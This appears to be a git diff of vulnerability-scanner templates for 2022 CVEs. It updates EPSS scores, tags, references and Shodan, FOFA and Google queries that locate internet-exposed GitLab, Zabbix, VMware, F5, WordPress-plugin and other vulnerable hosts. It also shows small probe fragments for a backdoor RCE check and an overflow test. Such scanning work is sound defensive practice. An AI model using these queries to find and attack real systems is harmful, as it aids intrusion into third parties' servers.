-27,7 +27,10 @@ info: max-request: 1 vendor: gitlab product: gitlab - shodan-query: http.title:"GitLab" + shodan-query: + - http.title:"GitLab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve,cve2022,gitlab diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index 466c24d3e5..05827444ed 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0785 cwe-id: CWE-89 - epss-score: 0.04043 - epss-percentile: 0.91894 + epss-score: 0.04032 + epss-percentile: 0.92073 cpe: cpe:2.3:a:daily_prayer_time_project:daily_prayer_time:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0814.yaml b/http/cves/2022/CVE-2022-0814.yaml index 2df77716c9..c00020505c 100644 --- a/http/cves/2022/CVE-2022-0814.yaml +++ b/http/cves/2022/CVE-2022-0814.yaml @@ -26,9 +26,9 @@ info: vendor: ubigeo_de_peru_para_woocommerce_project product: ubigeo_de_peru_para_woocommerce framework: wordpress - publicwww-query: "/wp-content/plugins/ubigeo-peru/" shodan-query: http.html:/wp-content/plugins/ubigeo-peru/ fofa-query: body=/wp-content/plugins/ubigeo-peru/ + publicwww-query: "/wp-content/plugins/ubigeo-peru/" tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth,ubigeo_de_peru_para_woocommerce_project http: diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index 7e3c3efc29..bc06fbf141 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -20,17 +20,19 @@ info: cvss-score: 5.3 cve-id: CVE-2022-0870 cwe-id: CWE-918 - epss-score: 0.00179 - epss-percentile: 0.54242 + epss-score: 0.00146 + epss-percentile: 0.50533 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: gogs product: gogs - google-query: intitle:"sign in - gogs" - shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + shodan-query: + - cpe:"cpe:2.3:a:gogs:gogs" + - http.title:"sign in - gogs" fofa-query: title="sign in - gogs" + google-query: intitle:"sign in - gogs" tags: cve,cve2022,ssrf,gogs,authenticated,huntr http: diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml index 0629f52cff..85d1490008 100644 --- a/http/cves/2022/CVE-2022-0885.yaml +++ b/http/cves/2022/CVE-2022-0885.yaml @@ -14,13 +14,14 @@ info: - https://wpscan.com/vulnerability/8b08b72e-5584-4f25-ab73-5ab0f47412df - https://wordpress.org/plugins/member-hero/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0885 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0885 cwe-id: CWE-862 - epss-score: 0.31455 - epss-percentile: 0.96571 + epss-score: 0.28394 + epss-percentile: 0.96849 cpe: cpe:2.3:a:memberhero:member_hero:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index 48a849cc41..532767f004 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -29,8 +29,12 @@ info: max-request: 3 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve2022,cve,authenticated,huntr,xss,microweber,cms http: diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index b79d93e52a..9317f3c6ed 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -29,8 +29,12 @@ info: max-request: 3 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve2022,cve,xss,microweber,huntr http: diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index ef21a9ce0f..68eb0a33e4 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -27,8 +27,12 @@ info: max-request: 3 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,xss,microweber,cms,authenticated,huntr,intrusive http: diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index 20f2bab0f9..e2de593779 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -21,14 +21,18 @@ info: cve-id: CVE-2022-0968 cwe-id: CWE-190 epss-score: 0.00076 - epss-percentile: 0.30933 + epss-percentile: 0.32297 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,overflow,microweber,cms,huntr variables: payload: '{{repeat("A", 600)}}' diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml index 1949e01973..ce4e8f27c4 100644 --- a/http/cves/2022/CVE-2022-1040.yaml +++ b/http/cves/2022/CVE-2022-1040.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: sophos product: sfos - shodan-query: http.title:"Sophos" + shodan-query: + - http.title:"Sophos" + - http.title:"sophos" fofa-query: title="sophos" google-query: intitle:"sophos" tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml index 8ba495106d..b921105049 100644 --- a/http/cves/2022/CVE-2022-1058.yaml +++ b/http/cves/2022/CVE-2022-1058.yaml @@ -27,8 +27,14 @@ info: max-request: 2 vendor: gitea product: gitea - shodan-query: title:"Gitea" - fofa-query: body="powered by gitea version" + shodan-query: + - title:"Gitea" + - http.html:"powered by gitea version" + - http.title:"gitea" + - cpe:"cpe:2.3:a:gitea:gitea" + fofa-query: + - body="powered by gitea version" + - title="gitea" google-query: intitle:"gitea" tags: cve,cve2022,huntr,open-redirect,gitea diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml index bc731d2142..bee7559ba8 100644 --- a/http/cves/2022/CVE-2022-1162.yaml +++ b/http/cves/2022/CVE-2022-1162.yaml @@ -26,7 +26,10 @@ info: max-request: 1 vendor: gitlab product: gitlab - shodan-query: http.title:"GitLab" + shodan-query: + - http.title:"GitLab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve,cve2022,gitlab,packetstorm diff --git a/http/cves/2022/CVE-2022-1170.yaml b/http/cves/2022/CVE-2022-1170.yaml index 211707edd9..ff44d4dfc9 100644 --- a/http/cves/2022/CVE-2022-1170.yaml +++ b/http/cves/2022/CVE-2022-1170.yaml @@ -24,9 +24,9 @@ info: vendor: nootheme product: jobmonster framework: wordpress - publicwww-query: "/wp-content/themes/noo-jobmonster" shodan-query: http.html:/wp-content/themes/noo-jobmonster fofa-query: body=/wp-content/themes/noo-jobmonster + publicwww-query: "/wp-content/themes/noo-jobmonster" tags: cve,cve2022,wpscan,wp,wp-theme,wordpress,xss,jobmonster,nootheme http: diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index 838d4ff3fe..60dd241a09 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -29,7 +29,7 @@ info: vendor: fusion_builder_project product: fusion_builder framework: wordpress - tags: cve,cve2022,wpscan,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive,theme-fusion + tags: cve,cve2022,wpscan,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive,theme-fusion,fusion_builder_project http: - raw: diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index 31d28239c7..a9494c2fdb 100644 --- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: f5 product: big-ip_access_policy_manager - shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" + shodan-query: + - http.title:"BIG-IP®-+Redirect" +"Server" + - http.title:"big-ip®-+redirect" +"server" fofa-query: title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" tags: cve,cve2022,f5,bigip,rce,mirai,kev diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml index 35cdd2ebf5..9d4a99d167 100644 --- a/http/cves/2022/CVE-2022-1439.yaml +++ b/http/cves/2022/CVE-2022-1439.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,microweber,xss,huntr http: diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml index 38f0a91daa..4d191b623b 100644 --- a/http/cves/2022/CVE-2022-1580.yaml +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -20,12 +20,14 @@ info: cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: freehtmldesigns - product: site_offline + product: "site_offline" framework: wordpress publicwww-query: "/wp-content/plugins/site-offline/" - tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp + shodan-query: http.html:/wp-content/plugins/site-offline/ + fofa-query: body=/wp-content/plugins/site-offline/ + tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp,freehtmldesigns flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index 0ab0a80386..14ba5d55b4 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -22,9 +22,9 @@ info: cpe: cpe:2.3:a:hc_custom_wp-admin_url_project:hc_custom_wp-admin_url:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 2 - vendor: hc_custom_wp-admin_url_project - product: hc_custom_wp-admin_url + max-request: 1 + vendor: "hc_custom_wp-admin_url_project" + product: "hc_custom_wp-admin_url" framework: wordpress tags: cve,cve2022,unauth,wpscan,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,hc_custom_wp-admin_url_project diff --git a/http/cves/2022/CVE-2022-1609.yaml b/http/cves/2022/CVE-2022-1609.yaml index 4e6b12b21f..dea30ad832 100644 --- a/http/cves/2022/CVE-2022-1609.yaml +++ b/http/cves/2022/CVE-2022-1609.yaml @@ -29,7 +29,7 @@ info: vendor: weblizar product: school_management framework: wordpress - tags: cve,cve2022,rce,wp,backdoor,wpscan,wordpress + tags: cve,cve2022,rce,wp,backdoor,wpscan,wordpress,weblizar variables: cmd: "echo CVE-2022-1609 | rev" diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml index 8a33280691..61d599b2e6 100644 --- a/http/cves/2022/CVE-2022-1713.yaml +++ b/http/cves/2022/CVE-2022-1713.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: diagrams product: drawio - shodan-query: http.title:"Flowchart Maker" + shodan-query: + - http.title:"Flowchart Maker" + - http.title:"flowchart maker" fofa-query: title="flowchart maker" google-query: intitle:"flowchart maker" tags: cve,cve2022,drawio,ssrf,oss,huntr,diagrams diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml index f0d37f6ab5..ef72c6a6d1 100644 --- a/http/cves/2022/CVE-2022-1724.yaml +++ b/http/cves/2022/CVE-2022-1724.yaml @@ -25,12 +25,11 @@ info: cpe: cpe:2.3:a:simple-membership-plugin:simple_membership:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 - vendor: simple-membership-plugin - product: simple_membership + max-request: 2 + vendor: "simple-membership-plugin" + product: "simple_membership" framework: wordpress tags: cve,cve2022,xss,wp,wordpress,wpscan,wp-plugin,simple-membership-plugin - flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml index a8e2315764..8bd91c588b 100644 --- a/http/cves/2022/CVE-2022-1756.yaml +++ b/http/cves/2022/CVE-2022-1756.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-1756 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36967 + epss-percentile: 0.37623 cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,9 +28,9 @@ info: vendor: thenewsletterplugin product: newsletter framework: wordpress - publicwww-query: "/wp-content/plugins/newsletter/" shodan-query: http.html:/wp-content/plugins/newsletter/ fofa-query: body=/wp-content/plugins/newsletter/ + publicwww-query: "/wp-content/plugins/newsletter/" tags: cve,cve2022,wpscan,newsletter,xss,authenticated,thenewsletterplugin,wordpress http: diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml index b22c6fb154..d6e80f9806 100644 --- a/http/cves/2022/CVE-2022-1815.yaml +++ b/http/cves/2022/CVE-2022-1815.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1815 cwe-id: CWE-918,CWE-200 - epss-score: 0.02327 - epss-percentile: 0.89496 + epss-score: 0.02239 + epss-percentile: 0.8954 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml index f8efe05078..eb87787730 100644 --- a/http/cves/2022/CVE-2022-1883.yaml +++ b/http/cves/2022/CVE-2022-1883.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-1883 cwe-id: CWE-89 - epss-score: 0.1005 - epss-percentile: 0.94774 + epss-score: 0.08142 + epss-percentile: 0.94315 cpe: cpe:2.3:a:camptocamp:terraboard:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml index c7f69c82e4..7c624a7c6b 100644 --- a/http/cves/2022/CVE-2022-1906.yaml +++ b/http/cves/2022/CVE-2022-1906.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1906 cwe-id: CWE-79 epss-score: 0.00086 - epss-percentile: 0.35299 + epss-percentile: 0.36517 cpe: cpe:2.3:a:digiprove:copyright_proof:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1910.yaml b/http/cves/2022/CVE-2022-1910.yaml index 0f74907a07..250b818361 100644 --- a/http/cves/2022/CVE-2022-1910.yaml +++ b/http/cves/2022/CVE-2022-1910.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1910 cwe-id: CWE-79 - epss-score: 0.00122 - epss-percentile: 0.46372 + epss-score: 0.00106 + epss-percentile: 0.43227 cpe: cpe:2.3:a:averta:shortcodes_and_extra_features_for_phlox_theme:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml index 3c368010a7..5b2a41575f 100644 --- a/http/cves/2022/CVE-2022-1952.yaml +++ b/http/cves/2022/CVE-2022-1952.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1952 cwe-id: CWE-434 - epss-score: 0.93584 - epss-percentile: 0.99051 + epss-score: 0.79729 + epss-percentile: 0.98289 cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -31,7 +31,6 @@ info: product: free_booking_plugin_for_hotels\,_restaurant_and_car_rental framework: wordpress tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics - variables: string: "CVE-2022-1952" diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml index 9f6f1bbebc..9e6f313511 100644 --- a/http/cves/2022/CVE-2022-21371.yaml +++ b/http/cves/2022/CVE-2022-21371.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: oracle product: weblogic_server - shodan-query: http.title:"oracle peoplesoft sign-in" + shodan-query: + - http.title:"oracle peoplesoft sign-in" + - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2022,lfi,weblogic,oracle,packetstorm diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml index 7ac734b179..853618651c 100644 --- a/http/cves/2022/CVE-2022-21500.yaml +++ b/http/cves/2022/CVE-2022-21500.yaml @@ -20,15 +20,17 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-21500 - epss-score: 0.92631 - epss-percentile: 0.98947 + epss-score: 0.93111 + epss-percentile: 0.99046 cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: oracle product: e-business_suite - shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 + shodan-query: + - http.title:"Login" "X-ORACLE-DMS-ECID" 200 + - http.title:"login" "x-oracle-dms-ecid" 200 fofa-query: title="login" "x-oracle-dms-ecid" 200 google-query: intitle:"login" "x-oracle-dms-ecid" 200 tags: cve,cve2022,oracle,misconfig,auth-bypass diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml index d1142b727b..68568a5416 100644 --- a/http/cves/2022/CVE-2022-21661.yaml +++ b/http/cves/2022/CVE-2022-21661.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: wordpress product: wordpress - shodan-query: cpe:"cpe:2.3:a:wordpress:wordpress" + shodan-query: + - cpe:"cpe:2.3:a:wordpress:wordpress" + - http.component:"wordpress" tags: cve2022,cve,wp,sqli,wpquery,wpscan,packetstorm,wordpress http: diff --git a/http/cves/2022/CVE-2022-2174.yaml b/http/cves/2022/CVE-2022-2174.yaml index 8c8c4fab1d..4d07749ca7 100644 --- a/http/cves/2022/CVE-2022-2174.yaml +++ b/http/cves/2022/CVE-2022-2174.yaml @@ -25,8 +25,12 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,huntr,microweber,xss,unauth http: diff --git a/http/cves/2022/CVE-2022-2185.yaml b/http/cves/2022/CVE-2022-2185.yaml index 6e688fe469..51695f9810 100644 --- a/http/cves/2022/CVE-2022-2185.yaml +++ b/http/cves/2022/CVE-2022-2185.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: gitlab product: gitlab - shodan-query: http.title:"GitLab" + shodan-query: + - http.title:"GitLab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve,cve2022,gitlab diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index 7d51544452..f5fed52599 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: juniper product: junos - shodan-query: title:"Juniper Web Device Manager" + shodan-query: + - title:"Juniper Web Device Manager" + - http.title:"juniper web device manager" fofa-query: title="juniper web device manager" google-query: intitle:"juniper web device manager" tags: cve2022,cve,xss,juniper,junos diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index d399f50761..fe125674f0 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -24,11 +24,13 @@ info: cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:* metadata: verified: true - max-request: 2 + max-request: 4 vendor: apollotheme - product: ap_pagebuilder + product: "ap_pagebuilder" framework: prestashop - shodan-query: http.component:"Prestashop" + shodan-query: + - "http.component:\"Prestashop\"" + - http.component:"prestashop" tags: cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme http: diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml index 04175f7749..0242bdcd9e 100644 --- a/http/cves/2022/CVE-2022-2290.yaml +++ b/http/cves/2022/CVE-2022-2290.yaml @@ -21,14 +21,16 @@ info: cve-id: CVE-2022-2290 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: trilium_project product: trilium - shodan-query: title:"Trilium Notes" + shodan-query: + - title:"Trilium Notes" + - http.title:"trilium notes" fofa-query: title="trilium notes" google-query: intitle:"trilium notes" tags: cve,cve2022,xss,trilium,huntr,trilium_project diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index 99a003e56f..d35b519f2a 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -28,7 +28,9 @@ info: vendor: vmware product: identity_manager shodan-query: http.favicon.hash:-1250474341 - fofa-query: icon_hash=-1250474341 + fofa-query: + - icon_hash=-1250474341 + - app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize" tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti http: diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml index 2147e6c1c8..4d3fead3ea 100644 --- a/http/cves/2022/CVE-2022-22972.yaml +++ b/http/cves/2022/CVE-2022-22972.yaml @@ -28,8 +28,11 @@ info: max-request: 3 vendor: vmware product: identity_manager - fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" shodan-query: http.favicon.hash:-1250474341 + fofa-query: + - app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" + - icon_hash=-1250474341 + - app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize" tags: cve2022,cve,vmware,auth-bypass,oast http: diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml index 5f1f191f50..2f0900c2e1 100644 --- a/http/cves/2022/CVE-2022-23102.yaml +++ b/http/cves/2022/CVE-2022-23102.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: siemens product: sinema_remote_connect_server - shodan-query: title:"Logon - SINEMA Remote Connect" + shodan-query: + - title:"Logon - SINEMA Remote Connect" + - http.title:"logon - sinema remote connect" fofa-query: title="logon - sinema remote connect" google-query: intitle:"logon - sinema remote connect" tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml index 15c48d8da6..3508784879 100644 --- a/http/cves/2022/CVE-2022-23131.yaml +++ b/http/cves/2022/CVE-2022-23131.yaml @@ -26,8 +26,15 @@ info: max-request: 2 vendor: zabbix product: zabbix - shodan-query: http.favicon.hash:892542951 - fofa-query: app="ZABBIX-监控系统" && body="saml" + shodan-query: + - http.favicon.hash:892542951 + - http.title:"zabbix-server" + - cpe:"cpe:2.3:a:zabbix:zabbix" + fofa-query: + - app="ZABBIX-监控系统" && body="saml" + - icon_hash=892542951 + - app="zabbix-监控系统" && body="saml" + - title="zabbix-server" google-query: intitle:"zabbix-server" tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml index ca2faed997..c289d30fcc 100644 --- a/http/cves/2022/CVE-2022-23134.yaml +++ b/http/cves/2022/CVE-2022-23134.yaml @@ -27,8 +27,14 @@ info: max-request: 2 vendor: zabbix product: zabbix - shodan-query: http.favicon.hash:892542951 - fofa-query: icon_hash=892542951 + shodan-query: + - http.favicon.hash:892542951 + - http.title:"zabbix-server" + - cpe:"cpe:2.3:a:zabbix:zabbix" + fofa-query: + - icon_hash=892542951 + - app="zabbix-监控系统" && body="saml" + - title="zabbix-server" google-query: intitle:"zabbix-server" tags: cve,cve2022,zabbix,auth-bypass,kev diff --git a/http/cves/2022/CVE-2022-2314.yaml b/http/cves/2022/CVE-2022-2314.yaml index 04b41916be..f64ac52f8f 100644 --- a/http/cves/2022/CVE-2022-2314.yaml +++ b/http/cves/2022/CVE-2022-2314.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2314 cwe-id: CWE-78,NVD-CWE-noinfo - epss-score: 0.26874 - epss-percentile: 0.96341 + epss-score: 0.37332 + epss-percentile: 0.97185 cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml index 0fc09bd71f..4ce3c4eac9 100644 --- a/http/cves/2022/CVE-2022-23347.yaml +++ b/http/cves/2022/CVE-2022-23347.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: bigantsoft product: bigant_server - shodan-query: http.html:"BigAnt" + shodan-query: + - http.html:"BigAnt" + - http.html:"bigant" fofa-query: body="bigant" tags: cve,cve2022,bigant,lfi,bigantsoft diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml index 1a6973ce62..7e4ae206a2 100644 --- a/http/cves/2022/CVE-2022-23544.yaml +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -28,8 +28,13 @@ info: max-request: 1 vendor: metersphere product: metersphere - shodan-query: html:"metersphere" - fofa-query: title="MeterSphere" + shodan-query: + - html:"metersphere" + - http.html:"metersphere" + fofa-query: + - title="MeterSphere" + - body="metersphere" + - title="metersphere" tags: cve2022,cve,metersphere,ssrf,oast,xss http: diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml index 6ecad729a3..0b60119936 100644 --- a/http/cves/2022/CVE-2022-23779.yaml +++ b/http/cves/2022/CVE-2022-23779.yaml @@ -27,8 +27,11 @@ info: max-request: 1 vendor: zohocorp product: manageengine_desktop_central - fofa-query: app="ZOHO-ManageEngine-Desktop" shodan-query: http.title:"manageengine desktop central 10" + fofa-query: + - app="ZOHO-ManageEngine-Desktop" + - title="manageengine desktop central 10" + - app="zoho-manageengine-desktop" google-query: intitle:"manageengine desktop central 10" tags: cve,cve2022,zoho,exposure,zohocorp diff --git a/http/cves/2022/CVE-2022-2379.yaml b/http/cves/2022/CVE-2022-2379.yaml index 61238c3033..7ae533b31b 100644 --- a/http/cves/2022/CVE-2022-2379.yaml +++ b/http/cves/2022/CVE-2022-2379.yaml @@ -14,13 +14,15 @@ info: - https://wpscan.com/vulnerability/0773ba24-212e-41d5-9ae0-1416ea2c9db6 - https://wordpress.org/plugins/easy-student-results/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2379 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/soxoj/information-disclosure-writeups-and-pocs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-2379 cwe-id: CWE-862 - epss-score: 0.01934 - epss-percentile: 0.87376 + epss-score: 0.02846 + epss-percentile: 0.90702 cpe: cpe:2.3:a:easy_student_results_project:easy_student_results:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml index 0f57d86547..5874d9dd08 100644 --- a/http/cves/2022/CVE-2022-23808.yaml +++ b/http/cves/2022/CVE-2022-23808.yaml @@ -28,8 +28,13 @@ info: max-request: 2 vendor: phpmyadmin product: phpmyadmin - shodan-query: http.component:"phpmyadmin" - fofa-query: title="phpmyadmin" + shodan-query: + - http.component:"phpmyadmin" + - http.title:"phpmyadmin" + - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" + fofa-query: + - title="phpmyadmin" + - body="pma_servername" && body="4.8.4" google-query: intitle:"phpmyadmin" 